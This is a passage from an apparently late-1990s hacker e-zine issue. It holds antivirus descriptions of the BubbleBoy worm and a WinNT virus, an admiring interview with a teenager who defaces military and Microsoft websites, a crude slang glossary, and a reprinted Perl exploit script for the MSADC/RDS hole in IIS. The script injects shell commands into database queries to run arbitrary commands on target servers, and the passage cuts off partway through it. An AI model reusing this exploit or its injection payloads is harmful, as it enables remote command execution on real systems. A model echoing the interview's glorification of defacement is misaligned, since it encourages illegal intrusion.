as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
YTcracker
Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #sesame
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
Our newsletter gets mirrored and indexed by new underground search engine Nethersearch.com
From: signalGod
To: hwa@press.usmc.net
Sent: Thursday, November 18, 1999 10:00 AM
Subject: NetherSearch.Com
HWA,
I am one of the webmasters of NetherSearch.Com. We subscribed to your newsletter and have
decided to download all of your newsletters to our server to act as a mirror for your files.
Please feel free to visit our site and check it out, and please let us know what your think.
Your newsletters have been added to our database, and is searchable with our database search
engine. We would also like to invite you to submit your website to our internet search database.
This will help us both by driving some traffic to your site and adding depth to our database.
Thanks,
______________________________________________________
SignalGod
NetherSearch.Com - http://www.nethersearch.com -
- Underground and Hacking Database Search Engine -
Submit a URL to NetherSearch.Com
- http://www.nethersearch.com/search/addurl.htm -
-=-
From: Drew aka. Wyzewun <wizdumb@webmail.co.za>
To: <cruciphux@dok.org>
Sent: Friday, November 19, 1999 1:36 PM
Subject: el8 phan mail!@#$%
*Ahem* Dear HWA.hax0r.news,
Since I have never seen anything in your mailbag, I figured I would
write to you and give you something to put there. First off, let me
dispell the rumour that Cruciphux has sex with sheep. Second of all,
let me dispell the rumour that there never *was* a rumour that
Cruciphux has sex with sheep. And in conclusion, I would like to say
that I personally enjoy having sex with sheep.
Your zine is the best in the whole wide world, except for that
Forbidden Knowledge zine, which is even more kickass. Now who does
that again... fux0r, I can't remember. But this is under no
circumstances because I am drunk. Or because Pneuma has mad cheap wine
here. It is just because I simply DON'T KNOW, okay?!@#$
Please respond to me as soon as possible and give me a URL for good
1nph0z3 on insecurities in Vortexia's anal cavity - they told me to
look for RFC31337, but I can't find it anywhere! Please help...
That Neato Elito Skanky Ass Hoe,
Wyzewun [w1@antioffline.com]
_______________________________________________________________
http://www.webmail.co.za the South-African free email service
-=-
From: Kernel Panic <kernelpanic@flashmail.com>
To: HWA.hax0r.news <HWA.hax0r.news-owner@listbot.com>
Sent: Tuesday, November 16, 1999 5:08 AM
Subject: RE: Issue #41 for Nov 7th out today
==================================================================
The following message was received at HWA.hax0r.news-owner@listbot.com
and is being forwarded to you, the list owner.
==================================================================
I just want to say "Thank U for the great job of resuming the events and
news of security bussiness"
Keep up with the excellent job
Kernel Panic
SouthAmerica-Peru
______________________________________________________________________
To unsubscribe, write to HWA.hax0r.news-unsubscribe@listbot.com
Start Your Own FREE Email List at http://www.listbot.com/
From: <Nautilus5@xxx.aol.com>
To: <cruciphux@dok.org>
Sent: Friday, November 19, 1999 9:06 PM
Subject: xxhax0rxx claims responsiblity for hacking & destroying website
Do you know this xxhax0rxx person? He has claimed responsibility for hacking
& destroying a school webpage....he also posted in its place a full page of
written garbage about our school. Please tell me that he is not affiliated
with your group. I can send all correspondence from him to you if you would
like. But he claims that he is Hax0r and goes by the screen name of xxhax0rxx.
-=-
Seems that because we have 'hax0r' in our name that we're target for all kinds
of lamers that use an alias or connotation of 'hax0r', notice the 'screenname'
good old aol... - Ed
See? we really do get mail Wyze1 ;-) I just don't print it all, ok sometimes
I forget, sometimes its lame ... but kudos are always welcomed... - Ed
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* We're a week behind schedule with this release again,
* seems like i'm not doing well in cold season. Being ill
* sucks and doesn't lend itself towards working on the
* newsletter. Anyway here it is, have fun.. check out all
* the new website defacements by sSh (Sesame Street Hackers)
* they've been busy ppl...
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start =-
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
_ _
___| |_ __ _ _ __| |_
/ __| __/ _` | '__| __|
\__ \ || (_| | | | |_
|___/\__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--= start =-
03.0 Bubbleboy email worm description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.avp.ch
I-Worm.BubbleBoy
Type: Email Worm
Platform: MS Windows with Internet Explorer 5.0,
MS Outlook 98/2000 or MS Outlook Express
This is a worm virus spreading via Internet as infected email messages. The worm arrives as a
message with no attachments - the worm uses several tricks to activate its code directly from
the message body. When this message is opened, the worm code takes control, gets access
to system resources (disk files and system registry), processes Outlook address book and
sends infected messages to these addresses (in a similar way the
Macro.Word97.Melissa"virus does).
This is the first known modern Internet worm that spreads its copies with no attached data. In
case of other Internet worms a user should open the attach to activate the worm routines. In
case of this worm its spreading routines take control at the moment the message itself is
opened.
The Tricks
To spread its copies this worm uses two tricks. The first one is the feature of MS Outlook that
allows creating messages in the HTML format. HTML messages may contain scripts that will
be automatically executed at the moment the HTML message is being displayed (user opens
the message). The worm uses this feature to run its code when the infected message is
opened.
To spread its copies further and to bypass Internet Explorer security the worm uses another
trick, the so-called "Scriptlet.Typelib" security vulnerability.
This security breach allows HTML scripts to create disk files. The worm uses this breach to
create a HTA-file (HTML Applications, new type appeared with IE5) which contains the main
worm code. This file is created in the Startup Windows folder, and as a result it is activated on
next Windows startup. Being run as a local disk file the worm script in this HTML gets access
to disk files and resources with no Internet Explorer security warning messages, connects
Outlook address book and spreads itself.
Technical details
When a user opens infected message the worm script embedded into this message body is
automatically activated and executed by MS Outlook. This script (by using security breach)
creates the "UPDATE.HTA" file in the "C:\WINDOWS\START MENU\PROGRAMS\STARTUP"
directory. The same file the worm tries to create in the "C:\WINDOWS\MENU
INICIO\PROGRAMAS\INICIO\" directory (Spain Windows default name).
This "UPDATE.HTA" file contains the main worm code. It will be executed on next Windows
startup because of its location in the Startup folder. The worm has a minor bug here: it
supposes that Windows is always installed in the C:\WINDOWS directory, in other case the
worm cannot create its file and fails to replicate further.
When the UPDATE.HTA file is executed, the worm runs Outlook application in hidden window
and creates a new message to all recipients from Outlook address book in the same way as
"Melissa" virus does. This new message has the HTML format and contains worms script in the
body. Message subject is "BubbleBoy back!", and text body is looks like follows:
The BubbleBoy incident, pictures and sounds
http://www.towns.com/dorms/tom/bblboy.htm
(Note: the above shown web-address doesn't work)
After this message is being sent, to prevent duplicate messages sending the worm creates in
system registry key:
"HKEY_LOCAL_MACHINE\Software\OUTLOOK.BubbleBoy\" = "OUTLOOK.BubbleBoy 1.0 by Zulu"
At the end the worm leaves on the screen the window with the text inside:
System error, delete "UPDATE.HTA" from the startup folder to solve this
problem.
The worm also changes the Windows registration data (this routine is executed at the moment
the UPDATE.HTA script takes control):
RegisteredOwner = "BubbleBoy"
RegisteredOrganization = "Vandelay Industries"
Protection
Microsoft has released an update that eliminates this security vulnerability. We strongly
recommend you visit http://support.microsoft.com/support/kb/articles/Q240/3/08.ASP and
install this update.
If you do not use any HTML applications (HTA-files) at your work, there is another way to
prevent infection by viruses of this type (the worms and viruses that use "Scriptlet.Typelib"
security vulnerability). It requires to remove the file association for .HTA extension. To do this
you have to follow several steps:
1.Double click the MyComputer icon on desktop.
2.In the appearing window choose menu the "View" -> "Options...".
3.On "File Types" tab in "Registered file types" listbox select "HTML Applicaton" item.
4.Click "Remove" button and confirm action.
5.Close options dialog box.
@HWA
04.0 WinNT.Infis.4608 new Win NT virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.avp.ch/
WinNT.Infis.4608
"Infis" is a memory resident virus operating under Windows NT 4.0 with Service Packs 2, 3, 4,
5, 6 installed. It does not affect systems running Windows 95/98, Windows 2000 or other
versions of Windows NT.
Indication of an infection
The virus does not manifest itself in any way and does not do any harm to the system. Despite
this the virus has a bug in its infection routine and corrupts some files while infecting them, the
corrupted files when run cause the standard "is not a valid Windows NT application" error
message.
Another indicator of virus presence is the INF.SYS file in the /WinNT/System32/Drivers folder.
Installation
The virus installation routine copies the virus to the system, registers itself in there and returns
control to the host program. As a result on first start the virus just installs its "dropper" to the
system and does not infect the WinNT memory and other files. The memory and file infection
routines will be activated later, when the "dropper" is run.
To install its "dropper" the virus extracts its "pure" code (4608 bytes) as a standalone PE EXE
file with the INF.SYS name and writes it to the \SystemRoot\system32\drivers directory. Next
the virus adds "run-it" commands to the system registry, to do that the virus creates new
Registry key with three sections::
\Registry\Machine\System\CurrentControlSet\Services\inf
Type = 1 - standard Windows NT driver
Start = 2 - driver start mode
ErrorControl = 1 - continue system loading on error in
driver
As a result the virus dropper is loaded as system WinNT driver on next system restart.
When the INF.SYS virus dropper takes control the virus allocates a block of WinNT memory,
reads its complete copy from the INF.SYS file for further use in infection routine and hooks a
poorly documented WinNT internal system functions handler. The virus hooker intercepts file
opening function only, checks the file name and extension, then opens the file, checks file
format (PE) and runs the infection routine.
Infection
The "Infis" virus infects only PE (Portable Executable) EXE-files except CMD.EXE (Windows
NT command processor). To separate infected and not infected files the virus sets file time and
date double word stamp in the PE header to -1 (FFFFFFFFh). While infecting a file the virus
increases the size of last file section, writes itself to there and modifies necessary fields in the
file header. As a result when infected PE files are executed, the virus code receives control and
runs the installation routine.
Payload
The "Infis" virus does not carry any destructive payload. However, it contains errors that corrupt
some files when infecting them. When the corrupted file is run it invokes a standard Windows
NT application error message.
05.0 OSALL Interview with Flipz 1st person to deface a Microsoft site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interview With Flipz
10/27/99
Mike Hudack
Editor-in-Chief
Flipz is a young man who both goes to school and moonlights as a systems
analyst somewhere. He�s got a bright future for someone only fifteen years
old [Editor�s NOTE: As the writer of this article, I must admit that I
am but sixteen years old.]... And, at that young age, he has been covered
in MSNBC, Ziff Davis, Slashdot and so many more. At that young age
he�s made history as the first person to deface a Microsoft Web page --
ever.
"I do it for fun, just like everyone does it for fun," Flipz said in an effect to
explain why he defaces sites, "we don�t do it because we have to, we don�t
do it because we want to, we don�t do it because it�s fun." He says that his
first defacement was when he was around ten or eleven -- that time a
Solaris machine.
He cnows that he hacs but doesn�t now that he�s defaced servers?
Andersen Air Force Base
"Hold on five seconds, I�ll tell you," he told me when I asked if anything else
was happening soon. After a couple affirmatives and a few obscenities he
informed me that he�d just gotten his latest defacement. "Andersen.af.mil,"
he calmly told me.
It was just the latest in a string of sites he had previously held root on.
Apparently something has happened in Flipz� life to make him want to just
throw it all out. "It�s been tough," he said. "I just wanted to have some
fun," let out some pent-up aggression.
Microsoft
Now it seems that he targets Microsoft NT boxes exclusively, explaining
that he hates Windows NT -- and that Windows 2000 pisses him off even
more.
The thing that Flipz is most famous for right now is defacing the first
Microsoft site ever. He was on the phone with someone when he defaced
it... When he heard it was the first he was excited, but not suprised. "I kind
of knew it, but I didn�t know it," he says about the defacement.
High Profile
Like the Microsoft defacement, all of Flipz� attacks have been attention
garnering, although none so much as that. He�s attacked numerous military
sites, including from the Navy and Army. In addition he�s defaced two
Department of Energy Web sites and the Duracell Battery Company,
among others.
Law Enforcement
It was a couple months ago when Flipz defaced People�s Bank, a relatively
small Connecticut bank. Somewhat aftewards Attrition.org was
subpeonaed for any records they may have pertaining to Flipz and the
defacement. When I told him about the subpeona Flipz was rather shocked
that the FBI hadn�t raided him yet. "It�s been a while... you�d think they
would have at least stopped me after White Sands [Missile Base.]"
The FBI didn�t though. At one point during our conversation Flipz thought
he was being raided as a black van rounded the corner to his house. It
turned out to be nothing, however. "I�m just sitting on edge, waiting for
them to raid me," he said.
He explained that he hadn�t done much to cover his tracks because they�d
find him anyway. "Why bother with twenty hops when they�ll just issue
twenty subpeonas?" And, he added, "even if I cover my tracks well... all
they need is one person on IRC to say `oh, I know who this person is.�"
The FBI, at this point, doesn�t seem to know Flipz� identity. They asked
me several times in a later interview, and each time came up empty because
I didn�t know myself. More is available on the FBI.
Skills
Some people on IRC have questioned Flipz� skills. Flipz says that he
"works with NT on a daily basis [as a] systems analyst" but others aren�t
too sure.
"He�s demonstrated no real NT skills," said one IRCer who knew flipz but
wished to remain anonymous. This IRCer said that all the defacements
were on NT systems running IIS, insinuating that Flipz was simply using the
eEye exploit released earlier this year.
But Flipz mantains that "I�m not using IIS, I�m not using FrontPage, I�m not
using FTP exploits..." Rather, he says he�s using "some exploits modified
for my own use and a private one or two." More detail on his
methodology, or speculation thereof, is available.
Related links:
http://www.aviary-mag.com/News/FBI/fbi.html
http://www.aviary-mag.com/News/Old_News/IIS___eEye/iis___eeye.html
http://www.aviary-mag.com/News/The_Exploit/the_exploit.html
Flipz' Exploit? (Previously released)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########################################################################
#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
###########################################################
# config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
###########################################################
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}
if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup
if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}
#crippled
if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;
##############################################################################
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
$aa="VbBusObj.VbBusObjCls.GetRecordset";
$bb="2";
} else {
$aa="AdvancedDataFactory.Query";
$bb="3";}
#crippled
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
;
$msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
$dsn="$p1";}
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}
elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}
elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$dsn="$p1";}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}
##############################################################################
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
##############################################################################
sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
##############################################################################
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
##############################################################################
sub try_btcustmr {
foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";
